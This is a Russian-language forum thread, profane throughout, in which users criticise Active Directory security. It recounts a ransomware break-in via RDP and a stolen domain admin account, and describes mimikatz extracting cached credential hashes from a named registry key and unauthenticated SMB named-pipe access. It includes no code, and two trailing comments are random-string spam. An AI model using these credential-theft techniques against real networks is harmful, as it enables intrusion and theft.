                                      Ахаха! А как тачку в домен ввести, не логинясь на неё админом?
                                      Ответить
                                      • Отформатировал тачку, ввел ее в домен, перезагрузил, всё.

                                        А если тебе принесли ноут и попросили ввести в домен, то ты сначала его отформатируй
                                        Ответить
                                        • > отформатировал

                                          Охуеть юзабилити...

                                          Почему нельзя ввести тачку в домен извне? Например она кидала бы запрос, а ты бы его аппрувил как админ. Или так реально можно?
                                          Ответить
                                          • Я не знаю, я админил что-то только во времена w2k, и тогда так было нельзя.

                                            Похоже что и сейчас нельзя.

                                            On the Computer Name tab, click Change.

                                            Under Member of, click Domain, type the name of the domain that you wish this computer to join, and then click OK.
                                            Ответить
                                            • You should never administer a trusted system (that is, a secure server such as a domain controller) from a less-trusted host (that is, a workstation that is not secured to the same degree as the systems it manages).

                                              ЗАЧЕМ ЖЕ ВЫ БЛЯДИ по своему RPC сраному с админской тачки даете админить DC?

                                              ou should not rely on a single authentication factor when performing privileged activities; that is, user name and password combinations should not be considered acceptable authentication because only a single factor (something you know) is represented.

                                              ПОЧЕМУ же вы бляди в 2021-м году ключей в RDP не завезли??
                                              Ответить
                                              • Или вот например контроллеры домена удобно вынести в другую сеть, и разрешить только нужные порты

                                                Вот и MS подсказывает:
                                                1024-65535/TCP/UDP

                                                ПИЗДЕц
                                                Ответить
                                                • > нужные порты

                                                  Мне так нравится дебиановская тачка -- одинокий порт network manager'а для DHCP (avahi я вырубила). И тишина.
                                                  Ответить
                                                  • У опенка по умолчанию слушается 0 портов (судя по netstat), но и у дебиана неплохо, да.

                                                    У винды, благодаря RPC Port Mapper, можно считать, что их примерно 2 в степени 16
                                                    Ответить
                                                    • > 0 портов

                                                      Даже dhcp клиента нету? Поднимают по-необходимости на время хендшейка?
                                                      Ответить
                                                      • ну его надо явно включать, а если ты поставил ОС, то ничего не слушается
                                                        Ответить
              • А знаешь почему у меня жопа горит? Мне рассказали как у человека поломали сетку, и я так расстроился, словно это у меня поломали, потому что так быть НЕ ДОЛЖНО. С этим миром что-то ОЧЕНЬ не так.

                У него зашли на RDP (может быть там была проброска) и спиздили аккаунт доменного админа (может быть через тот самый мимикац, а может там пароль был забит в task scheduler, откуда он плейн текстом досается бесплатной тулой) зашли на hyper-v (сегментации сети не было) и зашифровали к хуям все vhdx.

                Бекап делался на synology на который зашли по веб интерфейсу (разумеется, там аутентификация была через LDAP в AD) и пересоздали рейд несколько раз, похерив предыдущую разбивку, и рейд превратился в множество случайных блоков, и теперь хотят по 10К баксов за сервер.

                Я вдруг осознал, что если бы там не было ёбаного AD, то этого бы не случилось, и что самая блядь популярная в офисных сетях вещь -- говно и не нужно.

                То есть делать бекапы на доступную доменным пользователям машину и держать hyper-v в одной сети с пользователями тоже не нужно, но блядь всё бы это никому не помогло, если бы там тупо были разные пароли везде, и разные ключи
                Ответить
                • хотя админ вероятно виноват в чём-то сам, очень жаль, что нельзя майков или любую другую компанию по факту за такое засудить
                  Ответить
                  • Майки скажут, что он не применил best practicies, да.

                    Просто страшно, что в типовой MS сети у хакера есть инструмент чтобы просто все сломать, и этот инструмент хранится крайне хуево.
                    Ответить
                    • > best practices

                      Вообще, один из принципов безопасности гласит: "дефолтный конфиг должен быть безопасным".

                      Но совместимость, да. Вдруг в домене ХР и админ расстроится, что она не видит сеть изкоробки.
                      Ответить
                      • Почему не дать галочку "запретить пидарасов младше w10 и server2019"?
                        Ответить
                        • > запретить

                          Не запретить, а разрешить. Чтобы проковыривание дыр для старого говна было осознанным.
                          Ответить
                      • но XP уже несколько лет считай что закопали, какая уж тут совместимость?
                        Ответить
                        • Ну не ХР так семёрка... МС всегда тащит совместимость с чем-нибудь.
                          Ответить
                            • Ну вот сервер 2024 или сколько там выйдет с отключенным по-умолчанию говном...

                              Энтерпрайз -- не мобилки. Тут годы нужны на любое изменение.
                              Ответить
                              • не знаю, чо ты меня решил подъебнуть мобилками, но вон ведроёбам по похожим причинам такой зоопарк приходится поддерживать, что вендоадмин прослезится
                                Ответить
                                • Да, но ты прогу можешь за день задеплоить и через неделю старый бекенд с поддержки снять.

                                  Любые изменения в виндовых протоколах -- это годы.
                                  Ответить
                                  • я не про бэкенд, а про старые версии андроида

                                    да и на ios мы 3-4 последние версии поддерживаем
                                    Ответить
                                    • Я немного про другой сценарий...

                                      Представь, что у тебя есть десятилетняя версия твоей проги под ведро. И ты не можешь заставить юзеров её обновить. Не ведро, а твою прогу.

                                      И эта старая прога заставляет держать костыли в бекенде и новых версиях.

                                      Вот в этой ситуации и находится мс.
                                      Ответить
                                      • мс не может сделать фикс, который сменит настройки по умолчанию, потому что ...?
                                        Ответить
                                        • Потому что это сломает взаимодействие со старыми версиями. И они не могут заставить юзеров обновиться.

                                          Ты можешь. Они нет.

                                          З.Ы. И я не могу (((
                                          Ответить
                                          • Если xp не поддерживается, то кого простите ипёт, что там в ней сломается?
                                            Ответить
                                            • Что ты зацепился за ХР? У них всегда шлейф старого говна на 10 лет назад, которое ещё поддерживается и должно работать.

                                              А серваки выходят не каждый год, да и админы не прыгают сразу на последний.
                                              Ответить
                                              • Нельзя выпустить патч для текущей версии сервака?

                                                Какие-то бюрократические проблемы, если честно
                                                Ответить
                                                  • Работающую сеть с нескучным набором анальных уязвимостей, угу
                                                    Ответить
                                                    • Но она работала. И ты (майкрософт) сломал её своим патчем. А на уязвимости всем похуй пока реально не выебут.
                                                      Ответить
                                                      • В чём проблема предупредить за три там месяца про грядущие изменения?

                                                        Ну и так-то security fixes они поставляют регулярно. Они никогда ничего не ломают?
                                                        Ответить
                                                        • > три месяца

                                                          Да, охуенно какому-нибудь банку услышать, что у него есть три месяца на апгрейд банкоматов...

                                                          Да он просто пошлёт твой патч нахер да и всё.
                                                          Ответить
                                                          • Я не уверен, что через банкомат можно взломать AD

                                                            Но, если да, то банк ссзб
                                                            Ответить
                                                            • А если нельзя, то зачем ты сломал чувакам сеть своим говнопатчем?! У них все работало. И даже секьюрно было.
                                                              Ответить
                                                • Ну вот я и говорю, что после мобилок сложно мыслить по-энтерпрайзному...

                                                  Не как что-то плохое.
                                                  Ответить
                                                  • Почему просто не признать, что майкам похуй, потому что это не они попали на несколько килобаксов денег?
                                                    Ответить
                                                    • Им похуй, конечно. Согласно EULA они тебе ничего не должны.
                                                      Ответить
                                          • Только что закоммитила в репу ломающие изменения. Я -- бог.
                                            А секрет в том, что никогда нельзя мажорную версию делать более нуля.
                                            Ответить
                            • чувак, в server 2019 до сих пор есть Internet Explorer
                              Ответить
                              • а теперь проследим за нитью беседы

                                "Вдруг в домене ХР и админ расстроится, что она не видит сеть изкоробки."
                                "в server 2019 до сих пор есть Internet Explorer"

                                определитесь там между собой, мы про сервер или про клиента щас?
                                Ответить
                                • Мы про майков энтерпрайз

                                  Почему нельзя по умолчанию все сделать супер секурно?
                                  Потому что отвалится какое-то старое говно, и будет нытья выше крыши: "мы не купим ваш новый сервер, он не работает с XP. Да, мы знаем, что XP устарел, но нам похуй, у нас на нем 1000 машин работает"
                                  Ответить
                                  • Потому люди, которые видели хрюшу только на картинках, должны жрать говно вместе со всеми.

                                    Какой социализм )))
                                    Ответить
                                    • Ну, они свободны включить галочку "я не хочу жрать говно".
                                      Ответить
                        • Смотри ещё раз в чём разница.

                          Ты посылаешь юзера со старой версией твоей проги нахер. Он ставит новую и радуется. В худшем случае пишет коммент, что ты всё больше и больше грузишь его телефон.

                          Если новый софт от мс посылает энтерпрайз юзера нахер, то нахер идёт новый софт от мс. Энтерпрайз останется на старой версии, там где всё работало. И будет за это платить. Годами.
                          Ответить
                          • Платить за что? За официально не поддерживаемые системы?

                            А, если мс заартачится, то перейдут на какую-нибудь фрибсд?)

                            По сути, мы щас говорим о том, что всем пофиг на секьюрность, несмотря на кококо из каждого утюга
                            Ответить
                            • А ты же в курсе, про уровни "неподдерживаемости"?

                              Сначала перестают продавать. Потом перестают поддерживать обычных хомяков. Потом перестают поддерживать тех, кто платил за продление поддержки неподдерживаемого... Но если хорошо заплатят -- можно и сделать им фиксы под ХР, так и быть.
                              Ответить
                                • У меня был случай, когда пришлось фиксить баг в ветке многолетней давности. Потому что вип. Потому что ему проще заплатить, чем обновляться.
                                  Ответить
                                  • Косвенно это объясняет «популярность» винды на серверах.

                                    Виндофон они тоже примерно таким же образом просрали, ничего не делая
                                    Ответить
                                      • Изначально они никуда не опоздали, просто не нужно выпускать апдейт, который был нужен через шесть месяцев, через два года
                                        Ответить
                                    • А с популярностью винды на серверах всё гораздо проще. Она платная. И если ты не фанат технологий от мс, тратиться на неё нет никакого смысла.

                                      Большим конторам не хочется платить за каждый инстанс. Мелким хватает пхп на шареде. Ниши для винды нет.
                                      Ответить
                                      • По моему вся моя веточка объясняет низкую популярность винды на серваках, лол)
                                        Ответить
                          • И тут возникает парадокс -- чтобы уломать энтерпрайз на новую версию надо... чтобы новая версия уживалась со старыми.
                            Ответить
                • > разные пароли

                  Я думаю, без АД его точно так же бы разъебали, только чуть позже... Если хакер получил локал админа на тачке админа -- сети пизда в любом случае. Хоть пароли там хоть смарткарты.
                  Ответить
                  • Ну а как бы он получил админа на тачке админа без AD?

                    Вот у меня свой локальный пароль на ноуте, а на сервер я хожу по ключу, а на соседний комп тоже по ключу, и как пользователь удаленного сервера ко мне попадет?

                    Керберос сосет кажется что
                    Ответить
                    • Ну вот твою тачку ломанут и выебут всю сеть через неё. Как правило это так и происходит. А не изнутри локалки.
                      Ответить
                      • Так ломанули-то не его тачку, как я понял. Его тачка наружу не торчала.
                        Ломанули терминальный сервак, и там каким-то образом получили доменного админа. Как именно я не понял (он тоже не понял видимо) но он заходил на терминальный сервак под собой, значит там мог быть его NTLM хеш, и если на том серваке под амином сидел какой-нить, не знаю, 1С ник, то он мог спиздить

                        Нужно отключать NTLM как минимум
                        Ответить
                • Вспомнил Мыщъха:

                  «Механизмы аутентификации, вызывающие множество нареканий еще со времен 9x, похоже не претерпели никаких радикальных изменений, откатившись назад в мрачную готическую тьму средневековья, когда нестандартные клиенты типа SAMBA предоставляли доступ ко многим защищенным ресурсам не требуя авторизации. Помнится, реакция Microsoft была такова: "SAMBA – это _неправильный_ клиент, пользуйтесь штатными средствами Windows и у вас не будет никаких проблем". Похоже, парни из Рейдмонда не понимают чем клиент отличается от сервера и до сих пор не въезжают в тему. А может, просто трава такая попалась. Термоядерная. Уж всяко не местная подзаборная.

                  Иначе чем можно объяснить тот факт, что протокол SMB держит для своих внутренних целей именованный канал (поанглийски — pipe) "IPC$", через который можно подключаться к ресурсам netlogon, lsarpc и samr _без_ аутентификации! В SMB2 этот список пополнился: "protected_storage" и "lsass", что легко проверить с помощью скрипта trypipes.py, входящего в состав знаменитого хакерского набора dcerpc...»
                  Ответить
                  • RPC поверх named pipes поверх SMB это вообще пиздец, конечно.
                    Причем RPC может еще и просто случайный порт открыть: как мапер решит.

                    И без этого не работает AD. То есть на сервере где хранятся все пароли нужно держать открытым SMB и примерно все порты
                    Ответить
        • Лол, и церберские тикеты тоже...

          Цирк безопасности какой-то.
          Ответить
      • Ну да, нужен контакт с цербером, а он только с членами домена общается...

        Видимо отсюда и возникают ёбнутые конфигурации, когда личный ноут болтается в рабочем домене.
        Ответить
        • Члены домена какие-то... у меня в GNU/Linux нет никаких членов домена (если конечно Samba не ставить, но она нахуй не нужна)
          Ответить
            • Можно, но не нужно.

              нужно выпустить ключ, и публичный ключ сунуть везде где нужно, и ходить по SSH.
              И не думать про мимикацов блядь
              Ответить
              • Ну при этом всё равно нужно относиться к удалённой тачке как к враждебной, ничего там не вбивать и с неё никакие коннекты не устанавливать.
                Ответить
                • да, но если ты зашел туда с аккаунтом AD то ты уже насрал туда своим паролем в случае винды

                  просто блядь охуенно же. Особенно охуенно что оно хранит десять паролей по умочлапнию последних чтобы залогиница если DC лежит
                  Ответить
                  • Лол, просто по порядку перебирает?

                    Какая безопасность )))
                    Ответить
                    • https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/interactive-logon-number-of-previous-logons-to-cache-in-case-domain-controller-is-not-available

                      Users who access the server console will have their logon credentials cached on that server. A malicious user who is able to access the file system of the server can locate this cached information and use a brute-force attack to determine user passwords.


                      Одной из возможностей mimikats – получения хэша паролей пользователей из ветки реестра HKEY_LOCAL_MACHINE\SECURITY\Cache, в которую сохраняются хэши паролей последних 10 (по-умолчанию) доменных пользователей, врошедших в систему. Эти хэши в обычном случае могут использоваться для авторизации пользователей в системе при недоступности контроллера домена.


                      https://winitpro.ru/index.php/2017/08/24/metody-zashhity-ot-mimikatz-v-domene-windows/
                      Ответить
                      • А как бы ты сделал, кстати? При потере связи с цербером оставил бы все тачки неюзабельными? Боюсь, юзерам не понравится.
                        Ответить
                        • > При потере связи оставил бы все тачки неюзабельными? Боюсь, юзерам не понравится.
                          Фейсбуку норм же.
                          Ответить
                          • Думаешь, стоит хранить в реестре пароли от десяти последних случайных пользователей фб на всякий случай?
                            Ответить
                            • Не случайных, а тех что на твоей тачке заходили. В общем-то браузер их и хранит, если ты согласился.
                              Ответить
                        • Именно так бы и сделал по умолчанию.
                          Если админ хочет -- может отключить.
                          Ответить
                          • Очень рискованно, на самом деле. Потом придётся бежать в серверную и чинить цербера прям там... Пока вся сеть лежит.

                            Имхо, надо просто нормальные пароли и нормальный хеш. И пусть забрутятся.
                            Ответить
                            • сложно сказать что рискованее: дырень или вот это вот

                              однако я соглашусь, что нужно просто хешить sha256 с хорошей рендомной солью (на каждой машине своей, намайненной из энтропии) ну или sha3, но я в него не умею
                              Ответить
                              • > sha256

                                Тут главное что с солью и миллионы раз. А сам хеш не особо критичен.

                                Удачного брута по 1 паролю в секунду.

                                А если взять какой-нибудь argon-2, там ещё и гигов 8 памяти уйдёт на время хеширования. Что сразу отбросит видюхи и асики.
                                Ответить
                                • почему вообще админу виден хеш, когда он не LocalSystem?

                                  Почему не запретить debug для админа, почему не запретить debug TCB всегда без включенного в BCD ключа?
                                  Ответить
                                  • > виден

                                    У админа в любом случае хватит прав чтобы изъебнуться и прочитать, даже если ты отберёшь очевидные привилегии...

                                    Если это не какой-то кастрированный админ базы данных или веб-морды.
                                    Ответить
                                    • А как хватит, если ОС запретит дебаг без ключа ядру?

                                      Ну не нужен дебаг на сервере, тем более дебаг LSSAS
                                      Ответить
                                      • > дебаг

                                        Ну ты же понимаешь, что кроме дебага есть ещё 100500 способов достать эту инфу...

                                        Возможно с приходом win 11 ситуация изменится, раз там TPM и HVCI по-умолчанию.
                                        Ответить
                            • > бежать в серверную
                              В некоторых организациях — лететь. Хорошо, если визу получать для этого не нужно.
                              Ответить
                              • В таких серверных нужно своего питуха иметь
                                Ответить
                                  • Ну бывает так, что Важный Админ сидит в головном офисе, а в серверных копашатся мелкие аникеи и попингуи.

                                    Админ прихел в командировку, всё настроил, и уехал. А они только диски меняют и кабеля обжимают
                                    Ответить
                      • Интересно, а для проверки логина он тупо выдаёт хеш клиенту, а тот сравнивает с хешем от того, что вбил юзер?
                        Ответить
                      • Кстати, там ведь не только пароль закешируется, но и весь роуминг профиль если админ это не отключил...
                        Ответить
              • Тащить на себе сырое мясо не завернутое в пакет... Там же одежде пиздец. Как его вообще в автобус впустили?
                Ответить
                  • Вас заклеймили, словно дешевые китайские безделушки.
                    Разогните рабские плечи, ударьте по наглой, лысой физиономии!

                    Один инкубатор это уже сделал. Скоро умрет от сердечного приступа.
                    Ответить
      • ээ.. а вполне можно пойти по RDP по паролю, kerberos тут не нужен. Просто машнику будет не аутентифицировать.
        Ответить
        • Дык там статья как раз про отключение этой механики?
          Ответить
          • Там статья скорее всего про запрет доступа по сети (через RPC, SMB итд по нтлм) а не про RDP.
            Я по RDP хожу на рабочу машину с домашней, ясен хуй я не в домене
            Ответить
  • А вы тоже коллеционируете магнитики от павших в бою жёстких дисков?
    Ответить
  • [color=whirw]v0Ku1Zp6Vw1Hx7Tv9Hj2Vl5Ci7Pi4Kp6Iq9Zq4Ex 1Bl2Sh3Ey4Le3Sr8Rk3Tw5Ta4Iz0Qt3Gf9Ml0Ma2 Yx8Gx5Tr5Mz1Vn6Wl9Jt[/color]
    Ответить
  • [color=whirw]q8Pz6Ru1Tb5Yv5Bs0Xx2We3Lp2Vr4Ot8Lh8Ar6Cb 0Sh8Ph8Za3Fn8Td9Er3To5Od8Ns3Jz5Gu4Qj6Zx3 Vg7Ij2Rz7Vx3Wb3Mg4Fv[/color]
    Ответить

Добавить комментарий для Okay_guy Отменить ответ

Из-за тебя ушел bormand, guest!

    А не использовать ли нам bbcode?


    8